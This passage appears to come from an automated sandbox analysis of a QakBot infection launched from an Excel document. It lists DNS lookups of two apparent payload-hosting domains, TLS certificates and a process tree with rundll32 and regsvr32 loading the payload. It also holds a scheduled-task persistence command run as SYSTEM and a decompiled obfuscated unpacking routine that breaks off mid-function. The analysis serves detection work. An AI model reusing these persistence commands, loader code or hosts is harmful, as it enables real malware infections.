May 12, 2021 13:32:25.526416063 CEST	53	55854	8.8.8.8	192.168.2.4
May 12, 2021 13:32:25.992902994 CEST	64549	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:26.068509102 CEST	53	64549	8.8.8.8	192.168.2.4
May 12, 2021 13:32:26.986114025 CEST	64549	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:27.048033953 CEST	53	64549	8.8.8.8	192.168.2.4
May 12, 2021 13:32:28.002069950 CEST	64549	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:28.062403917 CEST	53	64549	8.8.8.8	192.168.2.4
May 12, 2021 13:32:30.039849043 CEST	64549	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:30.091464996 CEST	53	64549	8.8.8.8	192.168.2.4
May 12, 2021 13:32:31.023514032 CEST	63153	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:31.072433949 CEST	53	63153	8.8.8.8	192.168.2.4
May 12, 2021 13:32:31.249562979 CEST	52991	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:31.299894094 CEST	53	52991	8.8.8.8	192.168.2.4
May 12, 2021 13:32:32.471741915 CEST	53700	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:32.521842957 CEST	53	53700	8.8.8.8	192.168.2.4
May 12, 2021 13:32:32.547735929 CEST	51726	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:32.610028028 CEST	53	51726	8.8.8.8	192.168.2.4
May 12, 2021 13:32:33.344405890 CEST	56794	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:33.393066883 CEST	53	56794	8.8.8.8	192.168.2.4
May 12, 2021 13:32:34.123672009 CEST	64549	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:34.201133966 CEST	53	64549	8.8.8.8	192.168.2.4
May 12, 2021 13:32:37.946820021 CEST	56534	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:37.998413086 CEST	53	56534	8.8.8.8	192.168.2.4
May 12, 2021 13:32:39.252321959 CEST	56627	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:39.300998926 CEST	53	56627	8.8.8.8	192.168.2.4
May 12, 2021 13:32:40.682939053 CEST	56621	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:40.731926918 CEST	53	56621	8.8.8.8	192.168.2.4
May 12, 2021 13:32:42.145760059 CEST	63116	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:42.199048042 CEST	53	63116	8.8.8.8	192.168.2.4
May 12, 2021 13:32:43.515748024 CEST	64078	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:43.566895962 CEST	53	64078	8.8.8.8	192.168.2.4
May 12, 2021 13:32:44.717510939 CEST	64801	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:44.767641068 CEST	53	64801	8.8.8.8	192.168.2.4
May 12, 2021 13:32:45.602051973 CEST	61721	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:45.661864996 CEST	53	61721	8.8.8.8	192.168.2.4
May 12, 2021 13:32:46.787492990 CEST	51255	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:46.844712973 CEST	53	51255	8.8.8.8	192.168.2.4
May 12, 2021 13:32:47.312530041 CEST	61522	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:47.374838114 CEST	53	61522	8.8.8.8	192.168.2.4
May 12, 2021 13:32:48.122045040 CEST	52337	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:48.174633026 CEST	53	52337	8.8.8.8	192.168.2.4
May 12, 2021 13:32:49.380045891 CEST	55046	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:49.428841114 CEST	53	55046	8.8.8.8	192.168.2.4
May 12, 2021 13:32:55.634301901 CEST	49612	53	192.168.2.4	8.8.8.8
May 12, 2021 13:32:55.694555998 CEST	53	49612	8.8.8.8	192.168.2.4
May 12, 2021 13:33:06.519836903 CEST	49285	53	192.168.2.4	8.8.8.8
May 12, 2021 13:33:06.583713055 CEST	53	49285	8.8.8.8	192.168.2.4
May 12, 2021 13:33:08.224392891 CEST	50601	53	192.168.2.4	8.8.8.8
May 12, 2021 13:33:08.281712055 CEST	53	50601	8.8.8.8	192.168.2.4
May 12, 2021 13:33:32.174385071 CEST	60875	53	192.168.2.4	8.8.8.8
May 12, 2021 13:33:32.250258923 CEST	53	60875	8.8.8.8	192.168.2.4
May 12, 2021 13:33:35.221759081 CEST	56448	53	192.168.2.4	8.8.8.8
May 12, 2021 13:33:35.280333042 CEST	53	56448	8.8.8.8	192.168.2.4
May 12, 2021 13:33:39.987410069 CEST	59172	53	192.168.2.4	8.8.8.8
May 12, 2021 13:33:40.055053949 CEST	53	59172	8.8.8.8	192.168.2.4
May 12, 2021 13:34:15.173784018 CEST	62420	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:15.245922089 CEST	53	62420	8.8.8.8	192.168.2.4
May 12, 2021 13:34:15.844187021 CEST	60579	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:15.896749973 CEST	53	60579	8.8.8.8	192.168.2.4
May 12, 2021 13:34:23.945249081 CEST	50183	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:24.064714909 CEST	53	50183	8.8.8.8	192.168.2.4
May 12, 2021 13:34:25.481246948 CEST	61531	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:25.538827896 CEST	53	61531	8.8.8.8	192.168.2.4
May 12, 2021 13:34:29.043479919 CEST	49228	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:29.102607012 CEST	53	49228	8.8.8.8	192.168.2.4
May 12, 2021 13:34:30.249735117 CEST	59794	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:30.373637915 CEST	53	59794	8.8.8.8	192.168.2.4
May 12, 2021 13:34:31.074817896 CEST	55916	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:31.133188963 CEST	53	55916	8.8.8.8	192.168.2.4
May 12, 2021 13:34:31.924369097 CEST	52752	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:31.984452963 CEST	53	52752	8.8.8.8	192.168.2.4
May 12, 2021 13:34:32.433563948 CEST	60542	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:32.493552923 CEST	53	60542	8.8.8.8	192.168.2.4
May 12, 2021 13:34:33.583031893 CEST	60689	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:33.640203953 CEST	53	60689	8.8.8.8	192.168.2.4
May 12, 2021 13:34:33.918680906 CEST	64206	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:33.990600109 CEST	53	64206	8.8.8.8	192.168.2.4
May 12, 2021 13:34:34.687747955 CEST	50904	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:34.736524105 CEST	53	50904	8.8.8.8	192.168.2.4
May 12, 2021 13:34:35.269757986 CEST	57525	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:35.337656021 CEST	53	57525	8.8.8.8	192.168.2.4
May 12, 2021 13:34:47.825035095 CEST	53814	53	192.168.2.4	8.8.8.8
May 12, 2021 13:34:47.883009911 CEST	53	53814	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 13:32:31.023514032 CEST	192.168.2.4	8.8.8.8	0xe7e0	Standard query (0)	signifysystem.com	A (IP address)	IN (0x0001)
May 12, 2021 13:32:32.547735929 CEST	192.168.2.4	8.8.8.8	0xf80c	Standard query (0)	fcventasyservicios.cl	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 13:32:31.072433949 CEST	8.8.8.8	192.168.2.4	0xe7e0	No error (0)	signifysystem.com		192.185.39.58	A (IP address)	IN (0x0001)
May 12, 2021 13:32:32.610028028 CEST	8.8.8.8	192.168.2.4	0xf80c	No error (0)	fcventasyservicios.cl		192.185.32.232	A (IP address)	IN (0x0001)
May 12, 2021 13:34:15.245922089 CEST	8.8.8.8	192.168.2.4	0x13c3	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 12, 2021 13:32:31.429538965 CEST	192.185.39.58	443	192.168.2.4	49729	CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020	Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
May 12, 2021 13:32:31.429538965 CEST	192.185.39.58	443	192.168.2.4	49729	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
May 12, 2021 13:32:32.934375048 CEST	192.185.32.232	443	192.168.2.4	49734	CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
May 12, 2021 13:32:32.934375048 CEST	192.185.32.232	443	192.168.2.4	49734	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 6780 Parent PID: 800

General

Start time:	13:32:23
Start date:	12/05/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0xf30000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7104 Parent PID: 6780

General

Start time:	13:32:32
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 ..\ritofm.cvm,DllRegisterServer
Imagebase:	0x10f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: QakBot, Description: QakBot Payload, Source: 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, Author: kevoreilly
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 6480 Parent PID: 7104

General

Start time:	13:32:51
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x1080000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: QakBot, Description: QakBot Payload, Source: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Author: kevoreilly
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5668 Parent PID: 6780

General

Start time:	13:32:51
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 ..\ritofm.cvm1,DllRegisterServer
Imagebase:	0x10f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6500 Parent PID: 6480

General

Start time:	13:32:51
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46
Imagebase:	0xb40000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6512 Parent PID: 6500

General

Start time:	13:32:52
Start date:	12/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 4816 Parent PID: 968

General

Start time:	13:32:54
Start date:	12/05/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Imagebase:	0x7ff7585d0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 5132 Parent PID: 4816

General

Start time:	13:32:55
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\ritofm.cvm'
Imagebase:	0x1200000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 3912 Parent PID: 5132

General

Start time:	13:32:57
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652
Imagebase:	0xfc0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 984 Parent PID: 968

General

Start time:	13:34:00
Start date:	12/05/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Imagebase:	0x7ff7585d0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 4780 Parent PID: 984

General

Start time:	13:34:01
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s 'C:\Users\user\ritofm.cvm'
Imagebase:	0x1200000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5828 Parent PID: 4780

General

Start time:	13:34:03
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 652
Imagebase:	0xfc0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 7104 Parent PID: 6780 rundll32.exeCOMMON

Executed Functions

Function 01057050, Relevance: 4.9, APIs: 3, Instructions: 379
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E01057050(void* __eax, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t199;
				int _t202;
				void* _t203;
				intOrPtr* _t214;
				signed int _t218;
				signed int _t220;
				signed int _t222;
				signed int _t225;
				intOrPtr* _t228;
				signed int _t240;
				signed int _t252;
				void* _t253;
				signed int _t254;
				void* _t259;
				void* _t262;
				void* _t266;
				signed int _t267;
				void* _t268;
				void* _t269;
				signed int _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				signed int _t281;
				signed int* _t285;
				signed int* _t286;

				_t266 = __edi;
				_t259 = __edx;
				_t253 = __ecx;
				 *((intOrPtr*)(_t281 + 0x19)) =  *((intOrPtr*)(_t281 + 0x19)) + __edx;
				_push(__eax);
				_push(__eax);
				_t285[1] =  *0x008B9688;
				 *0x008BA318 =  *0x008BA87C();
				_t199 = E010594CE(_t198, __ecx, __edx, __edi);
				if( *0x008B9A24 == 0) {
					_push(__edi);
					 *_t285 = 1;
					_t199 =  *((intOrPtr*)(0x8ba87c))();
					 *0x008B9A24 = _t199;
				}
				 *_t285 =  *_t285 | 0x0045d18c;
				_t252 = 0x45d18c;
				if( *_t285 != 0) {
					_push(_t252);
					 *_t285 =  *_t285 + 4;
					 *_t285 =  *_t285 - _t252;
					if( *((intOrPtr*)(_t252 + 0x45d23c)) == 0) {
						 *((intOrPtr*)(_t252 + 0x45d23c)) =  *((intOrPtr*)(_t252 + 0x45d670))();
					}
					_push(_t253);
					 *_t285 = 0x1000;
					if( *((intOrPtr*)(_t252 + 0x45d1d0)) == 0) {
						_t18 = _t252 + 0x45d274; // 0x8ba400
						 *(_t281 - 4) =  *(_t281 - 4) & 0x00000000;
						 *_t285 =  *_t285 | _t18;
						 *((intOrPtr*)(_t252 + 0x45d1d0)) =  *((intOrPtr*)(_t252 + 0x45d678))( *(_t281 - 4));
					}
					_push(_t272);
					_t272 =  *_t285;
					 *_t285 =  *(_t252 + 0x45caa8);
					if( *((intOrPtr*)(_t252 + 0x45c9a8)) == 0) {
						 *((intOrPtr*)(_t252 + 0x45c9a8)) =  *((intOrPtr*)(_t252 + 0x45d6f0))(0);
					}
					_push(0);
					if( *((intOrPtr*)(_t252 + 0x45c05c)) == 0) {
						_t30 = _t252 + 0x45c078; // 0x8b9204
						 *(_t281 - 4) = 0;
						 *_t285 =  *_t285 ^ _t30;
						 *((intOrPtr*)(_t252 + 0x45c05c)) =  *((intOrPtr*)(_t252 + 0x45d678))( *(_t281 - 4));
					}
					_t199 = VirtualAlloc();
					if( *((intOrPtr*)(_t252 + 0x45c790)) == 0) {
						 *(_t281 - 4) = 0;
						 *_t285 =  *_t285 | _t199;
						_t39 = _t252 + 0x45ca38; // 0x8b9bc4
						_t240 = _t39;
						 *(_t281 - 4) =  *(_t281 - 4) & 0x00000000;
						 *_t285 =  *_t285 ^ _t240;
						 *_t240 = 0x30;
						_t285[1] =  *(_t252 + 0x45d148);
						_t272 = _t272;
						 *((intOrPtr*)(_t252 + 0x45c790)) =  *((intOrPtr*)(_t252 + 0x45d6f4))(_t266,  *(_t281 - 4),  *(_t281 - 4));
						_t199 =  *_t285;
						_t285 =  &(_t285[1]);
					}
				}
				_push(_t253);
				 *_t285 =  *_t285 & 0x00000000;
				 *_t285 =  *_t285 | _t199;
				if( *((intOrPtr*)(_t252 + 0x45cf08)) == 0) {
					 *_t285 = _t199;
					_t49 = _t252 + 0x45c644; // 0x8b97d0
					 *(_t281 - 4) = 0;
					 *_t285 =  *_t285 ^ _t49;
					 *((intOrPtr*)(_t252 + 0x45cf08)) =  *((intOrPtr*)(_t252 + 0x45d678))( *(_t281 - 4),  *(_t281 - 4));
					_t199 = 0 ^  *_t285;
					_t285 = _t285 - 0xfffffffc;
				}
				_pop( *_t54);
				if( *((intOrPtr*)(_t252 + 0x45c344)) == 0) {
					 *_t285 =  *_t285 & 0x00000000;
					 *_t285 =  *_t285 ^ _t199;
					 *((intOrPtr*)(_t252 + 0x45c344)) =  *((intOrPtr*)(_t252 + 0x45d64c))(_t259);
					_t199 =  *_t285;
					_t285 = _t285 - 0xfffffffc;
				}
				 *(_t252 + 0x45c42c) = 2;
				if( *((intOrPtr*)(_t252 + 0x45cab8)) == 0) {
					 *_t285 =  *_t285 - _t253;
					 *_t285 =  *_t285 + _t199;
					_t60 = _t252 + 0x45d1b8; // 0x8ba344
					 *_t285 =  *_t285 ^ _t281;
					 *_t285 =  *_t285 ^ _t60;
					 *((intOrPtr*)(_t252 + 0x45cab8)) =  *((intOrPtr*)(_t252 + 0x45d678))(_t281, _t253);
					_t199 =  *_t285;
					_t285 =  &(_t285[1]);
				}
				 *(_t252 + 0x45c730) = _t199;
				if( *(_t252 + 0x45c894) == 0) {
					_t65 = _t252 + 0x45cc54; // 0x8b9de0
					 *_t285 = _t65;
					_t199 =  *((intOrPtr*)(_t252 + 0x45d678))( *(_t281 - 4));
					 *(_t252 + 0x45c894) = _t199;
				}
				if( *(_t252 + 0x45ca68) > 0) {
					if( *((intOrPtr*)(_t252 + 0x45d39c)) == 0) {
						 *((intOrPtr*)(_t252 + 0x45d39c)) =  *((intOrPtr*)(_t252 + 0x45d64c))();
					}
					_t73 = _t252 + 0x45c42c; // 0x8b95b8
					_t220 = _t73;
					if( *((intOrPtr*)(_t252 + 0x45c058)) == 0) {
						 *(_t281 - 4) =  *(_t281 - 4) & 0x00000000;
						 *_t285 =  *_t285 | _t220;
						_t285[1] =  *(_t252 + 0x45c8a0);
						_t281 = _t281;
						 *((intOrPtr*)(_t252 + 0x45c058)) =  *((intOrPtr*)(_t252 + 0x45d6f0))( *(_t281 - 4));
						 *_t82 = _t266;
						_t220 =  *(_t281 - 4);
					}
					 *(_t281 - 4) =  *(_t281 - 4) & 0x00000000;
					_push( *(_t281 - 4));
					 *_t285 =  *_t285 | _t220;
					if( *(_t252 + 0x45c04c) == 0) {
						_t220 =  *((intOrPtr*)(_t252 + 0x45d670))();
						 *(_t252 + 0x45c04c) = _t220;
					}
					_push(_t266);
					 *_t285 =  *_t285 + 0x40;
					 *_t285 =  *_t285 - _t266;
					if( *(_t252 + 0x45cbec) == 0) {
						_t220 =  *((intOrPtr*)(_t252 + 0x45d670))();
						 *(_t252 + 0x45cbec) = _t220;
					}
					_push(_t220);
					_t222 =  *_t285;
					 *_t285 =  *(_t252 + 0x45cde0);
					if( *(_t252 + 0x45cac0) == 0) {
						_t96 = _t252 + 0x45cba4; // 0x8b9d30
						_t228 = _t96;
						 *(_t281 - 4) = 0;
						 *_t285 =  *_t285 + _t228;
						 *_t228 = 0x30;
						_t285[1] =  *(_t252 + 0x45c7d4);
						_t259 = _t259;
						_t222 =  *((intOrPtr*)(_t252 + 0x45d6f4))(_t266,  *(_t281 - 4));
						 *(_t252 + 0x45cac0) = _t222;
					}
					_push(_t281);
					_push(_t222);
					_t285[1] =  *(_t252 + 0x45ca68);
					if( *((intOrPtr*)(_t252 + 0x45d22c)) == 0) {
						 *((intOrPtr*)(_t252 + 0x45d22c)) =  *((intOrPtr*)(_t252 + 0x45d64c))();
					}
					_t199 = VirtualProtect();
					if( *(_t252 + 0x45d194) == 0) {
						 *_t285 = _t199;
						_t225 =  *((intOrPtr*)(_t252 + 0x45d64c))( *(_t281 - 4));
						 *(_t252 + 0x45d194) = _t225;
						_t199 = _t225 & 0x00000000 ^  *_t285;
						_t285 =  &(_t285[1]);
					}
				}
				_push(_t259);
				 *_t285 = 0x258;
				if( *(_t252 + 0x45c8ec) == 0) {
					 *_t285 = _t199;
					_t218 =  *((intOrPtr*)(_t252 + 0x45d64c))( *(_t281 - 4));
					 *(_t252 + 0x45c8ec) = _t218;
					_t199 = _t218 & 0x00000000 |  *_t285;
					_t285 =  &(_t285[1]);
				}
				_push(_t253);
				 *_t285 =  *_t285 + 0x1256;
				 *_t285 =  *_t285 - _t253;
				if( *((intOrPtr*)(_t252 + 0x45c064)) == 0) {
					 *(_t281 - 4) = 0;
					 *_t285 =  *_t285 ^ _t199;
					_t120 = _t252 + 0x45c9ac; // 0x8b9b38
					_t214 = _t120;
					 *(_t281 - 4) = 0;
					 *_t285 =  *_t285 + _t214;
					 *_t214 = 0x30;
					 *((intOrPtr*)(_t252 + 0x45c064)) =  *((intOrPtr*)(_t252 + 0x45d6f4))( *(_t281 - 4),  *(_t281 - 4));
					 *_t125 = 0;
				}
				_t200 = E01059A7C(_t252, _t253, _t272);
				if( *((intOrPtr*)(_t252 + 0x45cd20)) == 0) {
					 *(_t281 - 4) = 0;
					 *_t285 =  *_t285 | _t200;
					 *((intOrPtr*)(_t252 + 0x45cd20)) =  *((intOrPtr*)(_t252 + 0x45d670))( *(_t281 - 4));
					_t200 = 0 ^  *_t285;
					_t285 =  &(_t285[1]);
				}
				if(_t200 != _t252) {
					if( *((intOrPtr*)(_t252 + 0x45d240)) == 0) {
						_t133 = _t252 + 0x45d1d4; // 0x8ba360
						 *_t285 =  *_t285 & 0x00000000;
						 *_t285 =  *_t285 | _t133;
						 *((intOrPtr*)(_t252 + 0x45d240)) =  *((intOrPtr*)(_t252 + 0x45d674))(_t253);
					}
					_push(_t272);
					_t272 =  *_t285;
					 *_t285 =  *(_t252 + 0x45d288);
					if( *((intOrPtr*)(_t252 + 0x45c350)) == 0) {
						 *((intOrPtr*)(_t252 + 0x45c350)) =  *((intOrPtr*)(_t252 + 0x45d64c))();
					}
					_push(_t281);
					_t281 =  *_t285;
					 *_t285 =  *(_t252 + 0x45c438);
					if( *((intOrPtr*)(_t252 + 0x45ccbc)) == 0) {
						 *((intOrPtr*)(_t252 + 0x45ccbc)) =  *((intOrPtr*)(_t252 + 0x45d670))();
					}
					_t200 = E01053943(_t200, _t252, _t253, _t259, _t266, _t272);
					if( *(_t252 + 0x45c2f0) == 0) {
						 *_t285 =  *(_t252 + 0x45c6b4);
						_t200 =  *((intOrPtr*)(_t252 + 0x45d6f0))(_t200);
						 *(_t252 + 0x45c2f0) = _t200;
					}
				}
				_t254 =  *(_t252 + 0x45cde0);
				if( *(_t252 + 0x45d024) == 0) {
					 *_t285 =  *_t285 & 0x00000000;
					 *_t285 =  *_t285 + _t254;
					_t153 = _t252 + 0x45c1f0; // 0x8b937c
					 *(_t281 - 4) =  *(_t281 - 4) & 0x00000000;
					 *_t285 =  *_t285 | _t153;
					_t200 =  *((intOrPtr*)(_t252 + 0x45d678))( *(_t281 - 4), _t259);
					 *(_t252 + 0x45d024) = _t200;
					_pop( *_t159);
					_t254 = 0 ^  *(_t281 - 4);
				}
				_t267 =  *(_t252 + 0x45ca68);
				if( *(_t252 + 0x45d36c) == 0) {
					 *_t285 = _t254;
					_t200 =  *((intOrPtr*)(_t252 + 0x45d6f0))(0,  *(_t281 - 4));
					 *(_t252 + 0x45d36c) = _t200;
					_t254 =  *_t285;
					_t285 = _t285 - 0xfffffffc;
				}
				_t274 = _t267 | _t267;
				_t268 = _t274;
				_t275 = _t272;
				if(_t274 != 0) {
					if( *((intOrPtr*)(_t252 + 0x45ceec)) == 0) {
						 *_t285 =  *_t285 ^ _t252;
						 *_t285 =  *_t285 | _t254;
						 *((intOrPtr*)(_t252 + 0x45ceec)) =  *((intOrPtr*)(_t252 + 0x45d648))();
						 *_t169 = _t252;
						_t254 =  *(_t281 - 4);
					}
					_push(_t252);
					 *_t285 =  *_t285 & 0x00000000;
					 *_t285 =  *_t285 ^ _t268;
					if( *((intOrPtr*)(_t252 + 0x45c924)) == 0) {
						 *_t285 =  *_t285 & 0x00000000;
						 *_t285 =  *_t285 | _t254;
						_t172 = _t252 + 0x45d0a4; // 0x8ba230
						 *_t285 = _t172;
						 *((intOrPtr*)(_t252 + 0x45c924)) =  *((intOrPtr*)(_t252 + 0x45d674))( *(_t281 - 4), _t281);
						_pop( *_t176);
						_t254 =  *(_t281 - 4);
					}
					_t200 = E01054795(_t200, _t252, _t254, _t259, _t268, _t275);
					if( *(_t252 + 0x45d0e8) == 0) {
						 *_t285 = _t254;
						_t200 =  *((intOrPtr*)(_t252 + 0x45d648))( *(_t281 - 4));
						 *(_t252 + 0x45d0e8) = _t200;
						_t254 =  *_t285;
						_t285 =  &(_t285[1]);
					}
				}
				_t262 = _t259;
				_t202 = memset(_t268, _t200 ^ _t200, _t254 << 0);
				_t286 =  &(_t285[3]);
				_t269 = _t268 + _t254;
				if( *(_t252 + 0x45d288) != _t252) {
					_push(_t275);
					_t286[1] =  *(_t252 + 0x45d288);
					_t277 = _t275; // executed
					_t203 = E0105822A(_t252, 0, _t262, _t269, _t277); // executed
					_push(_t203);
					_t286[1] =  *(_t252 + 0x45d288);
					E0105796E(_t252, _t262, _t269, _t277, _t203);
					 *_t286 = 0x8000;
					 *_t286 =  *(_t252 + 0x45d288);
					_t202 = VirtualFree(_t269, 0, _t269);
				}
				_t286[5] =  *(_t252 + 0x45c538);
				 *(_t281 + 4) =  *(_t252 + 0x45c538);
